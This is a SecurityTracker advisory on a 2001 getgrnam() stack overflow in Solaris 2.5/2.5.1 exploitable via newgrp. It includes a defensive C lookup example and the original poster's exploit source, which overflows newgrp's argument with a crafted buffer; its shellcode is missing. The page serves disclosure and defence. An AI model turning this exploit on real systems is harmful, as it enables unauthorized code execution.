Category:   OS (UNIX)  >   Getgrnam() function Vendors:   Sun
Solaris getgrnam() Function Call Allows Local Execution of Arbitrary Code
SecurityTracker Alert ID:  1000539
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 5 2001
Impact:   Execution of arbitrary code via local system
Exploit Included:  Yes  
Version(s): Solaris 2.5/2.5.1 without patch
Description:   It has been reported that the getgrnam() function in old versions of Solaris (2.5/2.5.1) contains a buffer overflow that permits local execution of arbitrary code. The getgrnam() function searches the group database for an entry with a matching name.

According to the report, this vulnerability may be exploited with the newgrp command.

Impact:   A malicious user with local access could cause arbitrary code to be executed on the host.
Solution:   Upgrade to a more recent version.
Cause:   Boundary error
Underlying OS:  UNIX (Solaris - SunOS)
Underlying OS Comments:  Solaris 2.5/2.5.1 without patch
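
The advisory classifies the cause as a boundary error: a caller-supplied group name reaches a fixed-size buffer with no length check, so an argument of several kilobytes (the posted exploit uses an 8300-byte one) overruns the stack. The program below is an example added to this page, not Solaris libc and not the poster's code; it shows the defensive form of the same lookup over a constructed in-memory group(5) database. GROUP_NAME_MAX (64), the sample entries and the function names are assumptions made for the example. The name is validated with a bounded scan before any lookup, is only ever compared in place, and the database field is copied into the fixed buffer only after its length has been checked.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative limit for the fixed buffers below; an assumption for this
 * example, not the Solaris value. */
#define GROUP_NAME_MAX 64

struct group_entry {
    char name[GROUP_NAME_MAX];
    unsigned long gid;
};

/* Constructed sample group database in group(5) format (not from the page). */
static const char *const SAMPLE_GROUPS[] = {
    "root:x:0:root",
    "staff:x:10:alice,bob",
    "wheel:x:0:alice",
    NULL
};

/* Check a caller-supplied group name before any lookup. Returns 0 when the
 * name is acceptable, otherwise an errno-style code: EINVAL for an empty
 * name or one containing a field separator or newline, ENAMETOOLONG for a
 * name that would not fit a GROUP_NAME_MAX buffer (including its NUL).
 * The scan stops at the limit, so a multi-kilobyte argument is rejected
 * without being walked to its end. */
int validate_group_name(const char *name)
{
    size_t i;
    if (name == NULL) return EINVAL;
    for (i = 0; i < GROUP_NAME_MAX && name[i] != '\0'; i++) {
        if (name[i] == ':' || name[i] == '\n') return EINVAL;
    }
    if (i == 0) return EINVAL;
    if (i >= GROUP_NAME_MAX) return ENAMETOOLONG;
    return 0;
}

/* Bounded lookup over the sample database. Returns 0 and fills *out on a
 * match, ENOENT when no entry matches, or the validation error. The caller's
 * name is compared in place and never copied into a fixed buffer; the
 * database field is copied only after its length is known to fit. */
int lookup_group(const char *name, struct group_entry *out)
{
    size_t i, name_len, field_len;
    int rc = validate_group_name(name);
    if (rc != 0) return rc;
    name_len = strlen(name);                         /* safe: validated above */
    for (i = 0; SAMPLE_GROUPS[i] != NULL; i++) {
        const char *line = SAMPLE_GROUPS[i];
        const char *colon = strchr(line, ':');
        const char *gid_field;
        char *end;
        unsigned long gid;
        if (colon == NULL) continue;                 /* malformed line: skip */
        field_len = (size_t)(colon - line);
        if (field_len != name_len || memcmp(line, name, field_len) != 0) continue;
        gid_field = strchr(colon + 1, ':');          /* skip the password field */
        if (gid_field == NULL) continue;
        gid_field++;
        gid = strtoul(gid_field, &end, 10);
        if (end == gid_field || *end != ':') continue;  /* gid must be numeric */
        memcpy(out->name, line, field_len);          /* field_len < GROUP_NAME_MAX */
        out->name[field_len] = '\0';
        out->gid = gid;
        return 0;
    }
    return ENOENT;
}

/* Convenience wrapper: the gid on success, or the negated error code. */
long lookup_gid(const char *name)
{
    struct group_entry g;
    int rc = lookup_group(name, &g);
    return rc == 0 ? (long)g.gid : -(long)rc;
}

/* Hand the lookup a name as large as the buffer the posted exploit passes to
 * newgrp (8300 bytes, filled with 'A') and report how it answers. */
int demo_overlong_rejected(void)
{
    static char big[8300];
    struct group_entry g;
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return lookup_group(big, &g);
}

int main(void)
{
    printf("staff -> gid %ld\n", lookup_gid("staff"));
    printf("overlong name -> %s\n", strerror(demo_overlong_rejected()));
    return 0;
}
```

The point for a caller such as newgrp is the same: validate the argument's length against the buffer it will be stored in before handing it to any library routine, rather than trusting the routine to do so.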

Message History:   None.

Source Message Contents

Subject:  Old getgrnam() Solaris 2.5 vulnerability


Old versions of Solaris, 2.5/2.5.1 (without patch), contain an
exploitable buffer overflow in the getgrnam() libc function.
Sorry if this is already known; it seems an old problem, but I failed
to find it in the bugtraq archives.
This vulnerability may be used in the newgrp command.


Pablo Sor

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
   getgrnam() function overflow.

   works against Solaris 2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.
*/

/* The shellcode bytes did not survive in the archived copy of this post;
   the empty initializer below is only a placeholder for the missing array. */
u_char shell[] = "";

u_long get_sp(void)
{
   __asm__("mov %sp,%i0 \n");
}

int main(void)
{
 long *p;
 long addr;
 char buf[8300];
 int i;

 addr = get_sp()-8096;
 printf("Jumping to address %p\n",(void *)addr);
 p = (long *) buf;
 for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
 for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
 p = (long *) &buf[8160];
 for (i=0;i<30;++i) *(p++) = addr;
 execl("/usr/bin/newgrp","newgrp",buf,(char *)0);
 return 0;
}




Copyright 2021, LLC